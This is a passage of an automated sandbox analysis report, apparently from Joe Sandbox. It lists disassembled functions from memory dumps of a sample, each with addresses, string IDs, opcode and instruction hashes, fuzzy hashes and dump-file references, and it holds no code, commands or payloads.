Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96

Function 0092C921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

. , xrefs: 0092C9CE

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
Instruction ID: dfc8cf7ba11879e7cde2236370a7cb5a91e729c99e54e8b5be5b5873237e9661
Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
Instruction Fuzzy Hash: 57C128F5D00226CBCB24CF29C8926BBB7B1FF95310F19865DD895AB794E734A841CB90

Function 00935BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

167H, xrefs: 00935CCC

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: 167H
API String ID: 0-2704650348
Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
Instruction ID: 8cc6017e158e504cd2145769efa1f1b3ca82f0d8f0f8c81a5c217854dccbe10c
Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
Instruction Fuzzy Hash: A7D18A726087445BD728CF288C817ABB796DFD9314F1A862CE8958B3C1D735DE05DB82

Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

167H, xrefs: 00425A65

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 167H
API String ID: 2994545307-2704650348
Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A

Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

. , xrefs: 0041C767

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94

Function 00931F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

&#, xrefs: 00931FE4

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-1789715784
Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
Instruction ID: 8244efc2404e3cee868ffe03ce360db02ba8f2816db87043af8fe2c088ad39fb
Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
Instruction Fuzzy Hash: 52A13AB26083105BD7189B28CC9367BB3E5EF91324F19892CF89697391E778ED05CB52

Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

&#, xrefs: 00421D7D

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-1789715784
Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A

Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

. , xrefs: 0041CBA7

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4

Function 0092C528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON

Download Yara Rule

Strings

de, xrefs: 0092C5B4

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: de
API String ID: 0-2106599819
Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
Instruction ID: 1e1de5c4c9bc908ff56c52387a3845b1efd0821b595a8a9ef83c7e037957e48e
Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
Instruction Fuzzy Hash: 299142B190C3218BC324DF28D89266BB7F2EFD1324F18992CE4D64B395E7789905C792

Function 0092D4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~, xrefs: 0092D5A2

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 8c5aa6b5a5b2fe2e388992ca06d89cc462c2ef20750d480a456fbd2899bcd495
Instruction ID: e2e668120d523505c37a3e3b4c614de527ffda47f8a7a8b87ae9edb660e78938
Opcode Fuzzy Hash: 8c5aa6b5a5b2fe2e388992ca06d89cc462c2ef20750d480a456fbd2899bcd495
Instruction Fuzzy Hash: 0CA14772A082615FCB25CE289C8066AB7E5AFD5320F19823DECA9873D5D6348D0AD7C1

Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~, xrefs: 0041D33B

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1

Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

RpB, xrefs: 00426FEB

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: RpB
API String ID: 0-664042118
Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A

Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

d1, xrefs: 004254D0

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: d1
API String ID: 0-4211392460
Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A

Function 009277E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

c$, xrefs: 0092796E

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: c$
API String ID: 0-2516980088
Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
Instruction ID: 9dc1067ce49faca44f4c49a06e5d4173c8157d091c1f678b0915a74ea2fc54b6
Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
Instruction Fuzzy Hash: 0D91B9B0104741CFE7248F25C4A4B63BBB2FF42318F19968CC4865FBA5E379A846CB94

Function 0094D557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0094D57C

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
Instruction ID: dee0cb5e6fc06966cc5f31eabd1f0b76aafda8af2d9f82ec1559af99de7aedba
Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
Instruction Fuzzy Hash: DC81AE786052019FD714DF28C881E6BB7E6EFD9314F19962CE5858B3A5EB31EC41CB42

Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043D315

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46

Function 0093A637 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0093A835

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 83540b58fbbb4f25ac9f4f97ce7208fba4b780cfae0c2bac99c0e25f514b2498
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: A871E332A083558FD714CE28C88071EBBE6ABC6714F29896DE4D49B391D235DD458F87

Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042A5CE

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B

Function 0094A9DE Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

w, xrefs: 0094AAD0

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-2991200456
Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction ID: 579bf9a41090ecdf96185af0a0ac50ca4f323aa4f6415306f25a15033767a687
Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction Fuzzy Hash: 094129B6E116118FD704DFA4CC455ABBB72FB84315B0AC1A8C8847B316D77869078BD0

Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

w, xrefs: 0043A869

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-2991200456
Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0

Function 0094CFC7 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0094CFEC

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
Instruction ID: 06d682bf6feff25b549290fb15659809de9acce761012726e205acc4b8f1ed76
Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
Instruction Fuzzy Hash: C0310438346300AFE7249F249C91F3BB7E8EB96B14F24492CE58493290D661EC51CA56

Function 0094D0F7 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0094D11C

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: ihgf
API String ID: 0-2948842496
Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
Instruction ID: 7261d105489ad5cb7641f105ca81e97b6814270b87edf1d76c75251c11219bea
Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
Instruction Fuzzy Hash: AD31077834A301ABE7148B249C81F3BB7E8EB8A714F24492CEA8597291D770EC50CA56

Function 0043CE90 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CEB5

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
Opcode Fuzzy Hash: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A

Function 00936739 Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

dB, xrefs: 00936739

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID: dB
API String ID: 0-2104629891
Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C

Function 004143C2 Relevance: .8, Instructions: 805COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
Opcode Fuzzy Hash: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A

Function 0043C280 Relevance: .4, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46

Function 0043C1F0 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
Opcode Fuzzy Hash: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46

Function 004166A0 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95

Function 00919967 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
Instruction ID: 76e9a001401f944efd5c9a3f0e1175500de874dfd07aa10eda31b0fa1ee5eeb0
Opcode Fuzzy Hash: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
Instruction Fuzzy Hash: 8BC1F3B160C3848BD718DF25C8606ABBBE6EFD2304F14492DE4D68B291DB35C54ACB56

Function 00409700 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56

Function 0092EC17 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
Instruction ID: 2e013c4a2a17e71917d364dee00e7237d4febe01854411b19a5292a564e8defa
Opcode Fuzzy Hash: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
Instruction Fuzzy Hash: 226147356083A04FC725CF28C891A2E7BE1AF96310F4986BDE8E48B3D2D675DC05D792

Function 0041E9B0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796

Function 004369A0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124075587.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
Opcode Fuzzy Hash: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96

Function 00926907 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_910000_5759.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
